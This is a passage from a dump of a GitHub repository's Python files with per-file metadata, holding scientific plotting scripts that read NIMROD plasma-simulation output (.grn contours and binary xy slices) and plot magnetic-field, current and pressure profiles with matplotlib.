plt.show()\n" }, { "alpha_fraction": 0.614449679851532, "alphanum_fraction": 0.6360567212104797, "avg_line_length": 26.44444465637207, "blob_id": "bcde36ef7df9a17af337fab0b208b4e4946c4331", "content_id": "975c33d9d126dbbffbfed02ff8f60d870c5024a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", 
"max_line_length": 70, "num_lines": 54, "path": "/plotingScripts/plotGrn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a .grn file and plots the seperatrix and wall'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\nimport sys as sys\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp/\"\nfileName = \"sol.grn\"\n\n\n\n\n# Begin actual code\nfullFilePath = homeDir + relDir + fileName\nxyCon = [] # list of contours\nit = 0\nwith open(fullFilePath, 'r') as grnFile:\n while(True):\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if(len(thisWords)==0): break\n if (thisWords[0] != 'x'+str(it)):\n sys.exit(\"Expecting x\" +str(it) + \" read \" + thisWords[0])\n nSep = int(thisWords[1])\n thisCon = np.zeros([nSep,2])\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for ix, xx in enumerate(thisWords):\n thisCon[ix,0]= float(xx)\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if (thisWords[0] != 'y'+str(it)):\n sys.exit(\"Expecting y\" +str(it) + \" read \" + thisWords[0])\n if (int(thisWords[1])!=nSep): sys.exit(\"nSep x != nSep y\")\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for iy, yy in enumerate(thisWords):\n thisCon[iy,1]= float(yy)\n xyCon.append(thisCon)\n it+=1\n if (it>5):\n break\n\nfor ii, iCon in enumerate(xyCon):\n plt.scatter(iCon[:,0],iCon[:,1],s=1, label = \"Contour :\" + str(ii))\n plt.legend()\nplt.show()\n\nplt.scatter(xyCon[1][:,0],xyCon[1][:,1])\nplt.show()" }, { "alpha_fraction": 0.5297410488128662, "alphanum_fraction": 0.5792713165283203, "avg_line_length": 35.9347038269043, "blob_id": "394a36b90a90302e60b5f962d0eb3f0c6c5fcee7", "content_id": "fe6a6de889a01f861ffef23189d6f49ba8d32b00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30547, "license_type": "no_license", "max_line_length": 292, "num_lines": 827, "path": "/surfmnNim/fieldIndex.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport struct\nimport numpy as np\n#from mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib import ticker\nfrom fgProfs import rho,qg,irho2,irho3,irho4\n\n\n# xy have elecd=0.25\n# file size = 4* (49*(mx*pd+1)+2)*(my*pd+1)\n\n#plt.rcParams['text.usetex']=True\n\nint_size = 4\nfloat_size = 4\nnimmx=144\nnimmy=128\nnimpd=5\n\nplotfields=0\n# list of file names to be read\nfiles=['/home/research/ehowell/SCRATCH/166439/footpoint_03300_q104/lphi5/S7Pr1e2_surfmn/xy_slice01.bin']\nfiles=['/home/research/ehowell/SCRATCH/166439/footpoint_03300_q104/lphi5/vac_surfmn/xy_slice01.bin']\nfiles=['/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/xy_slice.bin']\n#,'xy_slice17.bin','xy_slice260.bin']\n#files=['xy_slice15000.bin']\n# slicesy is between 0 and my*pd for all yslices\nslicesy=[0]\ncolor=cm.rainbow(np.linspace(0,1,len(slicesy)))\n#I assume all files have the same 
size\nmx={files[0]:nimmx}#,files[1]:128,files[2]:128}\nmy={files[0]:nimmy}#,files[1]:72,files[2]:72}\npd={files[0]:nimpd}#,files[1]:5,files[2]:5}\nnpx={}\nnpy={}\n\ntf={}\nix={}\niy={}\nR={}\nZ={}\nB0R={}\nB0Z={}\nB0T={}\nJ0R={}\nJ0Z={}\nJ0T={}\nV0R={}\nV0Z={}\nV0T={}\nP0={}\nPE0={}\nn0={}\ndiff={}\nBRr={}\nBZr={}\nBTr={}\nBRi={}\nBZi={}\nBTi={}\nJRr={}\nJZr={}\nJTr={}\nJRi={}\nJZi={}\nJTi={}\nVRr={}\nVZr={}\nVTr={}\nVRi={}\nVZi={}\nVTi={}\nPr={}\nPi={}\nPEr={}\nPEi={}\nNr={}\nNi={}\nCr={}\nCi={}\nTEr={}\nTEi={}\nTIr={}\nTIi={}\nN={}\n\n#each field will be a 2x2 array of size(mx*pd+1,my*pd+1)\nfor findex in range(len(files)):\n npx[files[findex]]=mx[files[findex]]*pd[files[findex]]+1\n npy[files[findex]]=my[files[findex]]*pd[files[findex]]+1\n\n tf[files[findex]]=np.zeros(47,dtype='f',order = 'F')\n ix[files[findex]]=np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n iy[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n B0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n J0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0R[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0Z[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n V0T[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n P0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PE0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n n0[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n diff[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n BTi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n JTi[files[findex]]= 
np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VRr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VZr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VTr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VRi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VZi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n VTi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Pr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Pi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PEr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n PEi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Nr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Ni[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Cr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n Ci[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TEr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TEi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TIr[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n TIi[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n N[files[findex]]= np.zeros((npx[files[findex]],npy[files[findex]]), dtype = 'f',order = 'F')\n\n\n\n\n f=open(files[findex], 'rb')\n limity=my[files[findex]]*pd[files[findex]]+1\n limitx=mx[files[findex]]*pd[files[findex]]+1\n\n jj=0\n f.seek(0)\n\n while jj < limity :\n ii=0\n while ii < limitx :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n# if jj==0 and (ii==0 or ii==1):\n# print blah\n temp=f.read(188)\n tf[files[findex]] = struct.unpack(\">\"+47*'f', temp)\n if jj==0 and (ii==0 or ii==1):\n tf1=tf\n# print tf1,'\\n'\n #last byte is length of string read\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n# if jj==0 and (ii==0 or ii==1):\n# print blah\n\n ix[files[findex]][ii,jj]=tf[files[findex]][0]\n iy[files[findex]][ii,jj]=tf[files[findex]][1]\n R[files[findex]][ii,jj]=tf[files[findex]][2]\n Z[files[findex]][ii,jj]=tf[files[findex]][3]\n B0R[files[findex]][ii,jj]=tf[files[findex]][4]\n B0Z[files[findex]][ii,jj]=tf[files[findex]][5]\n B0T[files[findex]][ii,jj]=tf[files[findex]][6]\n J0R[files[findex]][ii,jj]=tf[files[findex]][7]\n J0Z[files[findex]][ii,jj]=tf[files[findex]][8]\n J0T[files[findex]][ii,jj]=tf[files[findex]][9]\n V0R[files[findex]][ii,jj]=tf[files[findex]][10]\n V0Z[files[findex]][ii,jj]=tf[files[findex]][11]\n V0T[files[findex]][ii,jj]=tf[files[findex]][12]\n P0[files[findex]][ii,jj]=tf[files[findex]][13]\n PE0[files[findex]][ii,jj]=tf[files[findex]][14]\n n0[files[findex]][ii,jj]=tf[files[findex]][15]\n diff[files[findex]][ii,jj]=tf[files[findex]][16]\n BRr[files[findex]][ii,jj]=tf[files[findex]][17]\n BZr[files[findex]][ii,jj]=tf[files[findex]][18]\n BTr[files[findex]][ii,jj]=tf[files[findex]][19]\n 
BRi[files[findex]][ii,jj]=tf[files[findex]][20]\n BZi[files[findex]][ii,jj]=tf[files[findex]][21]\n BTi[files[findex]][ii,jj]=tf[files[findex]][22]\n JRr[files[findex]][ii,jj]=tf[files[findex]][23]\n JZr[files[findex]][ii,jj]=tf[files[findex]][24]\n JTr[files[findex]][ii,jj]=tf[files[findex]][25]\n JRi[files[findex]][ii,jj]=tf[files[findex]][26]\n JZi[files[findex]][ii,jj]=tf[files[findex]][27]\n JTi[files[findex]][ii,jj]=tf[files[findex]][28]\n VRr[files[findex]][ii,jj]=tf[files[findex]][29]\n VZr[files[findex]][ii,jj]=tf[files[findex]][30]\n VTr[files[findex]][ii,jj]=tf[files[findex]][31]\n VRi[files[findex]][ii,jj]=tf[files[findex]][32]\n VZi[files[findex]][ii,jj]=tf[files[findex]][33]\n VTi[files[findex]][ii,jj]=tf[files[findex]][34]\n Pr[files[findex]][ii,jj]=tf[files[findex]][35]\n Pi[files[findex]][ii,jj]=tf[files[findex]][36]\n PEr[files[findex]][ii,jj]=tf[files[findex]][37]\n PEi[files[findex]][ii,jj]=tf[files[findex]][38]\n Nr[files[findex]][ii,jj]=tf[files[findex]][39]\n Ni[files[findex]][ii,jj]=tf[files[findex]][40]\n Cr[files[findex]][ii,jj]=tf[files[findex]][41]\n Ci[files[findex]][ii,jj]=tf[files[findex]][42]\n TEr[files[findex]][ii,jj]=tf[files[findex]][43]\n TEi[files[findex]][ii,jj]=tf[files[findex]][44]\n TIr[files[findex]][ii,jj]=tf[files[findex]][45]\n TIi[files[findex]][ii,jj]=tf[files[findex]][46]\n ii=ii+1\n if (jj<(limity-1)):\n temp= f.read(8)\n jj=jj+1\n\n f.close()\n\n\n\nfor m in range(len(files)):\n for i in range(len(BRr[files[m]][:,0])-1):\n for j in slicesy:\n N[files[m]][i,j]=-(R[files[m]][i,j]/BZr[files[m]][i,j])*(BZr[files[m]][i+1,j]-BZr[files[m]][i,j])/(R[files[m]][i+1,j]-R[files[m]][i,j])\n if BZr[files[m]][i,j]==0:\n# print \"BZr=0\",BZr[files[m]][i,j]\n N[files[m]][i,j]=0\n if (R[files[m]][i+1,j]-R[files[m]][i,j])==0:\n# print \"R=0\",R[files[m]][i+1,j],R[files[m]][i,j]\n N[files[m]][i,j]=0\n N[files[m]][-1,j]=-(R[files[m]][-1,j]/BZr[files[m]][-1,j])*(BZr[files[m]][-1,j]-BZr[files[m]][-2,j])/(R[files[m]][-1,j]-R[files[m]][-2,j])\n\n\nqcon1=np.zeros((npx[files[findex]],npy[files[findex]]))\n#fgfile='fgprofs.bin'\nfgfile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/fgprofs.bin'\n\n\nfor j in range(npy[files[0]]):\n for i in range(qg[fgfile].size): \n print(j,i)\n qcon1[i+1,j]=qg[fgfile][i]\n qcon1[i+2,j]=-5.\n \n\nclines=301\n\npr_max = np.max(J0T[files[0]])\npr_min = np.min(J0T[files[0]])\n\nif abs(pr_max)>abs(pr_min):\n pr_min=-pr_max\nelse:\n pr_max=-pr_min\n\nlev,delta=np.linspace(pr_min,pr_max,clines,retstep=True)\n\nqlev=np.array([-4,-3,-2]) \n\nif plotfields==1:\n fig,ax=plt.subplots(1,2,figsize=(10,6),sharey=True) \n CS=ax[0].contourf(R[files[0]],Z[files[0]],J0T[files[0]],levels=lev,cmap=cm.seismic)\n\n QS=ax[0].contour(R[files[0]],Z[files[0]],qcon1,levels=qlev,colors='k',linestyles='solid')\n\n fmt = {}\n strs=[r'$q=\\!-4$',r'$q=\\!-3$',r'$q=\\!-2$']\n for l, s in zip(QS.levels, strs):\n fmt[l] = s\n\n manual_locations=[(1.36,0.85),(1.42,0.73),(1.48,0.59)]\n\n ax[0].clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n\n ax[0].set_aspect('equal')\n\n plt.setp(ax[0].get_xticklabels(), fontsize=18)\n plt.setp(ax[0].get_yticklabels(), fontsize=18)\n ax[0].set_title(r'Real $(J_{\\phi})$',fontsize=22)\n ax[0].set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n ax[0].set_ylabel(r'${\\rm Z\\,(m)}$',fontsize=20)\n cbar=plt.colorbar(CS,pad=0.01)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=18)\n cbar.ax.yaxis.set_offset_position('left')\n 
cbar.ax.yaxis.offsetText.set_fontsize(16)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n\n CS=ax[1].contourf(R[files[0]],Z[files[0]],J0T[files[0]],levels=lev,cmap=cm.seismic)\n\n QS=ax[1].contour(R[files[0]],Z[files[0]],qcon1,levels=qlev,colors='k',linestyles='solid')\n\n ax[1].clabel(QS,qlev,inline=1,fmt=fmt,manual=manual_locations,inline_spacing=15)\n\n ax[1].set_aspect('equal')\n\n plt.setp(ax[1].get_xticklabels(), fontsize=18)\n plt.setp(ax[1].get_yticklabels(), fontsize=18)\n ax[1].set_title(r'Real $(J_{\\phi})$',fontsize=22)\n ax[1].set_xlabel(r'${\\rm R\\,(m)}$',fontsize=20)\n\n plt.savefig('xy_J0T.png',bbox_inches='tight') \n\n fig,ax=plt.subplots(2,1,figsize=(5,10),sharex=True) \n\n plt.setp(ax[0].get_xticklabels(), fontsize=16)\n plt.setp(ax[0].get_yticklabels(), fontsize=16)\n\n jj=0\n for j in slicesy:\n ax[0].plot(R[files[0]][:,j],-J0T[files[0]][:,j],c='red',lw=3,label=r'With SOL')\n ax[0].plot(R[files[0]][:,j],-J0T[files[0]][:,j],c='blue',lw=3,label=r'Without SOL')\n \n jj=jj+1\n\n ax[0].set_xlim(2.23,2.25)\n ax[0].set_ylim(-10000,80000)\n\n ax[0].yaxis.major.formatter._useMathText = True\n ax[0].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax[0].yaxis.offsetText.set_fontsize(16)\n\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax[0].set_ylabel(r'$J_{0,\\phi}\\,({\\rm A/m^2})$',fontsize=18)\n #ax[0].set_xlabel(r'$R\\,({\\rm m})$',fontsize=18)\n\n plt.legend(loc=1,fontsize=14)\n\n plt.setp(ax[1].get_xticklabels(), fontsize=16)\n plt.setp(ax[1].get_yticklabels(), fontsize=16)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax[1].plot(R[files[0]][:,j],P0[files[0]][:,j],c='red',lw=3,label=r'With SOL')\n ax[1].plot(R[files[0]][:,j],P0[files[0]][:,j],c='blue',lw=3,label=r'Without SOL')\n \n jj=jj+1\n\n ax[1].set_xlim(2.23,2.25)\n ax[1].set_ylim(0,750)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax[1].set_ylabel(r'$P_0\\,({\\rm Pa})$',fontsize=18)\n ax[1].set_xlabel(r'$R\\,({\\rm m})$',fontsize=18)\n\n plt.legend(loc=1,fontsize=14)\n\n plt.savefig('xy_P0compare.png',bbox_inches='tight') \n\n fig=plt.figure(figsize=(12,12))\n\n ax=fig.add_subplot(431)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B_\\phi$ v. 
$R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(434)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRi[files[0]][:,j],label=r'$B_R$')\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZi[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$B_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTi[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n plt.tight_layout()\n filename=files[0].split('.')\n plt.savefig(filename[0]+\"_B1_findex.png\",bbox_inches='tight') \n \n fig=plt.figure(figsize=(12,12))\n\n ax=fig.add_subplot(431)\n plt.title(r'$B0R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0R[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B0R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B0Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0Z[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B0Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B0T$ v. 
$R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(434)\n plt.title(r'$V0T$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],V0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$P0$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],P0[files[0]][:,j],c=color[jj],label=r'$B_R$')\n \n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$P0$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$n0$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],n0[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n0$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(437)\n plt.title(r'$J0R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0R[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(438)\n plt.title(r'$J0Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0Z[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(439)\n plt.title(r'$J0T$ v. 
